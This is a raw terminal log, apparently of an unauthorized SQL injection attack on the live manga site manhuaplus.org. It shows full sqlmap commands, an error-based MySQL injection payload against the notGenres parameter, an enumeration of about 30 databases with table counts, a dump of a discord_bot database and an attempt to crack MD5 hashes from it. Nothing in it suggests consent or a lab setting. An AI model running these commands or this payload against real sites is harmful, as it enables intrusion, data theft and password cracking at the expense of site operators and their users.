| help_topic             | 735     |
| global_priv            | 59      |
| help_category          | 44      |
| help_relation          | 36      |
+------------------------+---------+

Database: doctruyen5s_pane
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| google_font            | 1001    |
| countries              | 246     |
| languages_code         | 79      |
| app_settings           | 69      |
| right_navigation_icon  | 25      |
| native_social          | 14      |
| social                 | 9       |
| pages                  | 5       |
| tab                    | 5       |
| floating               | 3       |
| app_translations       | 2       |
| about                  | 1       |
| notification           | 1       |
| splash                 | 1       |
| useragent              | 1       |
| users                  | 1       |
+------------------------+---------+

Database: manga347
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| log_list               | 294326  |
| chapter_data           | 23824   |
| user_log_reading       | 19247   |
| statistic              | 932     |
| emoji                  | 846     |
| taxonomy_manga         | 131     |
| `level`                | 100     |
| user_avatar            | 56      |
| mangas                 | 45      |
| ratings                | 14      |
+------------------------+---------+

Database: doctruyen5s_pico
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| wp_comments            | 1       |
| wp_term_relationships  | 1       |
+------------------------+---------+

Database: doctruyen5s_panel2
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| google_font            | 1001    |
| translations           | 341     |
| languages_code         | 79      |
| app_settings           | 69      |
| floating_translations  | 38      |
| app_translations       | 11      |
| languages              | 10      |
| settings               | 1       |
| useragent              | 1       |
+------------------------+---------+

Database: yaoitoondb
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| wp_term_relationships  | 1638    |
| wp_manga_chapters_data | 576     |
| wp_options             | 485     |
| wp_term_taxonomy       | 428     |
| wp_revslider_css       | 109     |
| wp_termmeta            | 21      |
+------------------------+---------+

Database: mansinraw_com
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| wp_options             | 199     |
| wp_term_relationships  | 117     |
+------------------------+---------+

Database: sql_manhuasect_c
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| wp_manga_chapters      | 7404    |
| wp_usermeta            | 4214    |
| wp_options             | 185     |
| wp_terms               | 116     |
+------------------------+---------+

Database: romanceplus
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| chapter_views          | 17083   |
| chapter_data           | 14342   |
| log_views              | 6974    |
| user_log_reading       | 505     |
| taxonomy               | 158     |
| mangas                 | 127     |
| `level`                | 100     |
| user_avatar            | 32      |
| reported               | 25      |
+------------------------+---------+

Database: sql_yaoitoon_com
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| log_list               | 18643513 |
| chapter_views          | 11083392 |
| chapter_data           | 158093  |
| chapters               | 158093  |
| log_views              | 133889  |
| user_reading_list      | 41687   |
| reported               | 5612    |
| user_avatar            | 997     |
| taxonomy               | 118     |
| `level`                | 100     |
+------------------------+---------+

Database: doctruyen5s
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| user_log_reading       | 540874  |
| user_reading_list      | 11141   |
| `user`                 | 5122    |
| log_list               | 3295    |
| mangas                 | 1369    |
| user_avatar            | 312     |
| ratings                | 293     |
| notification           | 209     |
| `level`                | 100     |
| user_request           | 7       |
| giftcard_type          | 4       |
+------------------------+---------+

Database: api_k6vn_org
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| `server`               | 80      |
| api_key                | 44      |
| pay_history            | 11      |
| `rank`                 | 5       |
+------------------------+---------+

Database: sql_mangakoma01_
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| log_list               | 19986   |
| chapters               | 13015   |
| log_views              | 7041    |
| `level`                | 100     |
| mangas                 | 98      |
| reported               | 4       |
| ratings                | 1       |
+------------------------+---------+

Database: manga_koma_net
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| chapters               | 25922   |
| emoji                  | 846     |
| mangas                 | 98      |
| `user`                 | 42      |
| ratings                | 27      |
| user_avatar            | 23      |
| user_reading_list      | 7       |
+------------------------+---------+

Code:
(myenv) root@E02S29:~# sqlmap -u "https://manhuaplus.org/filter/2/?chapter_count=0&genres=&notGenres=*" --level=3 --risk=2 --dbs --flush-session -                                                       -random-agent --batch --technique=E --threads=10 --dbms=mysql
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.9#pip}
|_ -| . [)]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:34:47 /2025-09-14/

[09:34:47] [INFO] fetched random HTTP User-Agent header value 'Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC)' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[09:34:47] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[09:34:47] [INFO] flushing session file
[09:34:47] [INFO] testing connection to the target URL
[09:34:48] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:34:49] [WARNING] reflective value(s) found and filtering out
[09:34:49] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[09:34:49] [INFO] testing for SQL injection on URI parameter '#1*'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (2) values? [Y/n] Y
[09:34:49] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:35:01] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:35:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:35:23] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:35:35] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:35:46] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[09:35:57] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:36:08] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:36:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:30] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:42] [INFO] testing 'MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:42] [INFO] URI parameter '#1*' is 'MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 532 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://manhuaplus.org/filter/2/?chapter_count=0&genres=&notGenres= (SELECT 7516 FROM(SELECT COUNT(*),CONCAT(0x71707a7171,(SELECT (EL                                                       T(7516=7516,1))),0x71626b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[09:36:42] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:36:44] [INFO] fetching database names
[09:36:44] [INFO] starting 10 threads
[09:36:44] [INFO] retrieved: 'information_schema'
[09:36:44] [INFO] retrieved: 'kmansin5s'
[09:36:44] [INFO] retrieved: 'mangasect'
[09:36:44] [INFO] retrieved: 'discord_bot'
[09:36:44] [INFO] retrieved: 'koma01com'
[09:36:44] [INFO] retrieved: 'mangaplus'
[09:36:44] [INFO] retrieved: 'wp_test'
[09:36:44] [INFO] retrieved: 'manhuaplus_xyz'
[09:36:44] [INFO] retrieved: 'backup_29_11_2022'
[09:36:44] [INFO] retrieved: 'manhuaplus_org'
[09:36:44] [INFO] retrieved: 'mangakoma'
[09:36:44] [INFO] retrieved: 'mangakoma-new'
[09:36:44] [INFO] retrieved: 'mysql'
[09:36:44] [INFO] retrieved: 'freemail'
[09:36:44] [INFO] retrieved: 'sys'
[09:36:44] [INFO] retrieved: 'yymh'
[09:36:45] [INFO] retrieved: 'doctruyen5s_pane'
[09:36:45] [INFO] retrieved: 'manga347'
[09:36:45] [INFO] retrieved: 'sql_manhuasect_c'
[09:36:45] [INFO] retrieved: 'performance_schema'
[09:36:45] [INFO] retrieved: 'doctruyen5s_panel2'
[09:36:45] [INFO] retrieved: 'yaoitoondb'
[09:36:45] [INFO] retrieved: 'doctruyen5s_pico'
[09:36:45] [INFO] retrieved: 'manga_koma_net'
[09:36:45] [INFO] retrieved: 'phpmyadmin'
[09:36:45] [INFO] retrieved: 'sql_mangakoma01_'
[09:36:45] [INFO] retrieved: 'doctruyen5s'
[09:36:45] [INFO] retrieved: 'sql_yaoitoon_com'
[09:36:45] [INFO] retrieved: 'api_k6vn_org'
[09:36:45] [INFO] retrieved: 'romanceplus'
available databases [30]:
[*] api_k6vn_org
[*] backup_29_11_2022
[*] discord_bot
[*] doctruyen5s
[*] doctruyen5s_pane
[*] doctruyen5s_panel2
[*] doctruyen5s_pico
[*] freemail
[*] information_schema
[*] kmansin5s
[*] koma01com
[*] manga347
[*] manga_koma_net
[*] mangakoma
[*] mangakoma-new
[*] mangaplus
[*] mangasect
[*] manhuaplus_org
[*] manhuaplus_xyz
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] romanceplus
[*] sql_mangakoma01_
[*] sql_manhuasect_c
[*] sql_yaoitoon_com
[*] sys
[*] wp_test
[*] yaoitoondb
[*] yymh

[09:36:45] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/manhuaplus.org'

[*] ending @ 09:36:45 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://manhuaplus.org/filter/2/?chapter_count=0&genres=&notGenres=*" --level=3 --risk=2  --random-agent --batch                                                        --technique=E --threads=10 --dbms=mysql --D discord_bot --tables
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.9#pip}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

Usage: python sqlmap [options]

sqlmap: error: no such option: --D
(myenv) root@E02S29:~# sqlmap -u "https://manhuaplus.org/filter/2/?chapter_count=0&genres=&notGenres=*" --level=3 --risk=2  --random-agent --batch                                                        --technique=E --threads=10 --dbms=mysql -D discord_bot --tables
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.9#pip}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:38:00 /2025-09-14/

[09:38:00] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[09:38:00] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[09:38:00] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://manhuaplus.org/filter/2/?chapter_count=0&genres=&notGenres= (SELECT 7516 FROM(SELECT COUNT(*),CONCAT(0x71707a7171,(SELECT (EL                                                       T(7516=7516,1))),0x71626b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[09:38:01] [INFO] testing MySQL
[09:38:02] [WARNING] reflective value(s) found and filtering out
[09:38:02] [WARNING] the back-end DBMS is not MySQL
[09:38:02] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system

[*] ending @ 09:38:02 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://manhuaplus.org/filter/2/?chapter_count=0&genres=&notGenres=*" --level=3 --risk=2  --random-agent --batch                                                        --technique=E --threads=10 -D discord_bot --tables
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.9#pip}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:38:19 /2025-09-14/

[09:38:19] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[09:38:19] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[09:38:19] [INFO] resuming back-end DBMS 'mysql'
[09:38:19] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://manhuaplus.org/filter/2/?chapter_count=0&genres=&notGenres= (SELECT 7516 FROM(SELECT COUNT(*),CONCAT(0x71707a7171,(SELECT (EL                                                       T(7516=7516,1))),0x71626b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[09:38:20] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:38:20] [INFO] fetching tables for database: 'discord_bot'
[09:38:20] [INFO] starting 2 threads
[09:38:20] [INFO] retrieved: 'token'
[09:38:20] [INFO] retrieved: 'links'
Database: discord_bot
[2 tables]
+-------+
| links |
| token |
+-------+

[09:38:20] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/manhuaplus.org'

[*] ending @ 09:38:20 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://manhuaplus.org/filter/2/?chapter_count=0&genres=&notGenres=*" --level=3 --risk=2  --random-agent --batch                                                        --technique=E --threads=10 -D discord_bot --tables --columns
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.9#pip}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:38:29 /2025-09-14/

[09:38:29] [INFO] fetched random HTTP User-Agent header value 'Opera/9.02 (Windows NT 5.1; U; ja)' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[09:38:29] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[09:38:29] [INFO] resuming back-end DBMS 'mysql'
[09:38:29] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://manhuaplus.org/filter/2/?chapter_count=0&genres=&notGenres= (SELECT 7516 FROM(SELECT COUNT(*),CONCAT(0x71707a7171,(SELECT (EL                                                       T(7516=7516,1))),0x71626b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[09:38:30] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:38:30] [INFO] fetching tables for database: 'discord_bot'
[09:38:30] [INFO] starting 2 threads
[09:38:30] [INFO] resumed: 'token'
[09:38:30] [INFO] resumed: 'links'
Database: discord_bot
[2 tables]
+-------+
| links |
| token |
+-------+

[09:38:30] [INFO] fetching columns for table 'links' in database 'discord_bot'
[09:38:30] [INFO] starting 6 threads
[09:38:30] [INFO] retrieved: 'sv1'
[09:38:30] [INFO] retrieved: 'time'
[09:38:30] [INFO] retrieved: 'id'
[09:38:30] [INFO] retrieved: 'sv3'
[09:38:30] [INFO] retrieved: 'sv2'
[09:38:31] [INFO] retrieved: 'int(11)'
[09:38:31] [INFO] retrieved: 'varchar(236)'
[09:38:31] [INFO] retrieved: 'datetime'
[09:38:32] [INFO] retrieved: 'varchar(32)'
[09:38:32] [INFO] fetching columns for table 'token' in database 'discord_bot'
[09:38:32] [INFO] starting 3 threads
[09:38:32] [INFO] retrieved: 'token'
[09:38:32] [INFO] retrieved: 'expire'
[09:38:33] [INFO] retrieved: 'timestamp'
[09:38:33] [INFO] retrieved: 'varchar(32)'
[09:38:33] [INFO] retrieved: 'int(11)'
Database: discord_bot
Table: links
[5 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| time   | datetime     |
| id     | int(11)      |
| sv1    |
| sv2    |
| sv3    | varchar(236) |
+--------+--------------+

Database: discord_bot
Table: token
[2 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| expire | timestamp   |
| token  | varchar(32) |
+--------+-------------+

[09:38:33] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/manhuaplus.org'

[*] ending @ 09:38:33 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://manhuaplus.org/filter/2/?chapter_count=0&genres=&notGenres=*" --level=3 --risk=2  --random-agent --batch                                                        --technique=E --threads=10 -D discord_bot --tables --columns --dump
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.9#pip}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:38:39 /2025-09-14/

[09:38:39] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.4 Safari/532.2' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[09:38:39] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[09:38:39] [INFO] resuming back-end DBMS 'mysql'
[09:38:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://manhuaplus.org/filter/2/?chapter_count=0&genres=&notGenres= (SELECT 7516 FROM(SELECT COUNT(*),CONCAT(0x71707a7171,(SELECT (EL                                                       T(7516=7516,1))),0x71626b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[09:38:40] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:38:40] [INFO] fetching tables for database: 'discord_bot'
[09:38:40] [INFO] starting 2 threads
[09:38:40] [INFO] resumed: 'token'
[09:38:40] [INFO] resumed: 'links'
Database: discord_bot
[2 tables]
+-------+
| links |
| token |
+-------+

[09:38:40] [INFO] fetching columns for table 'token' in database 'discord_bot'
[09:38:40] [INFO] starting 3 threads
[09:38:40] [INFO] resumed: 'token'
[09:38:40] [INFO] resumed: 'varchar(32)'
[09:38:40] [INFO] resumed: 'expire'
[09:38:40] [INFO] resumed: 'timestamp'
[09:38:40] [INFO] retrieved: 'id'
[09:38:40] [INFO] resumed: 'int(11)'
[09:38:40] [INFO] fetching columns for table 'links' in database 'discord_bot'
[09:38:40] [INFO] starting 6 threads
[09:38:40] [INFO] resumed: 'sv1'
[09:38:40] [INFO] resumed: 'id'
[09:38:40] [INFO] resumed: 'sv2'
[09:38:40] [INFO] resumed: 'int(11)'
[09:38:40] [INFO] resumed: 'time'
[09:38:40] [INFO] resumed: 'sv3'
[09:38:40] [INFO] resumed: 'varchar(236)'
[09:38:40] [INFO] resumed: 'datetime'
[09:38:40] [INFO] retrieved: 'hash'
[09:38:40] [INFO] resumed: 'varchar(32)'
Database: discord_bot
Table: token
[3 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| expire | timestamp   |
| id     | int(11)     |
| token  | varchar(32) |
+--------+-------------+

Database: discord_bot
Table: links
[6 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| hash   | varchar(32)  |
| time   | datetime     |
| id     | int(11)      |
| sv1    |
| sv2    |
| sv3    | varchar(236) |
+--------+--------------+

[09:38:42] [INFO] fetching columns for table 'token' in database 'discord_bot'
[09:38:42] [INFO] starting 3 threads
[09:38:42] [INFO] resumed: 'token'
[09:38:42] [INFO] resumed: 'id'
[09:38:42] [INFO] resumed: 'varchar(32)'
[09:38:42] [INFO] resumed: 'expire'
[09:38:42] [INFO] resumed: 'int(11)'
[09:38:42] [INFO] resumed: 'timestamp'
[09:38:43] [INFO] fetching entries for table 'token' in database 'discord_bot'
[09:38:44] [WARNING] reflective value(s) found and filtering out
[09:38:44] [WARNING] the SQL query provided does not return any output
[09:38:44] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[09:38:44] [WARNING] unable to retrieve the entries for table 'token' in database 'discord_bot'
[09:38:44] [INFO] fetching columns for table 'links' in database 'discord_bot'
[09:38:44] [INFO] starting 6 threads
[09:38:44] [INFO] resumed: 'id'
[09:38:44] [INFO] resumed: 'hash'
[09:38:44] [INFO] resumed: 'int(11)'
[09:38:44] [INFO] resumed: 'sv1'
[09:38:44] [INFO] resumed: 'varchar(32)'
[09:38:44] [INFO] resumed: 'sv2'
[09:38:44] [INFO] resumed: 'sv3'
[09:38:44] [INFO] resumed: 'time'
[09:38:44] [INFO] resumed: 'varchar(236)'
[09:38:44] [INFO] resumed: 'datetime'
[09:38:44] [INFO] retrieved: 'varchar(256)'
[09:38:44] [INFO] retrieved: 'varchar(256)'
[09:38:44] [INFO] fetching entries for table 'links' in database 'discord_bot'
[09:38:45] [INFO] starting 10 threads
[09:38:52] [INFO] recognized possible password hashes in column '`hash`'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[09:38:52] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[09:38:52] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[09:38:52] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[09:38:52] [INFO] starting 48 processes
[09:39:00] [WARNING] no clear password(s) found
Database: discord_bot
Table: links
[15 entries]

[09:39:00] [INFO] table 'discord_bot.links' dumped to CSV file '/root/.local/share/sqlmap/output/manhuaplus.org/dump/discord_bot/links.csv'
[09:39:00] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/manhuaplus.org'

[*] ending @ 09:39:00 /2025-09-14/
 

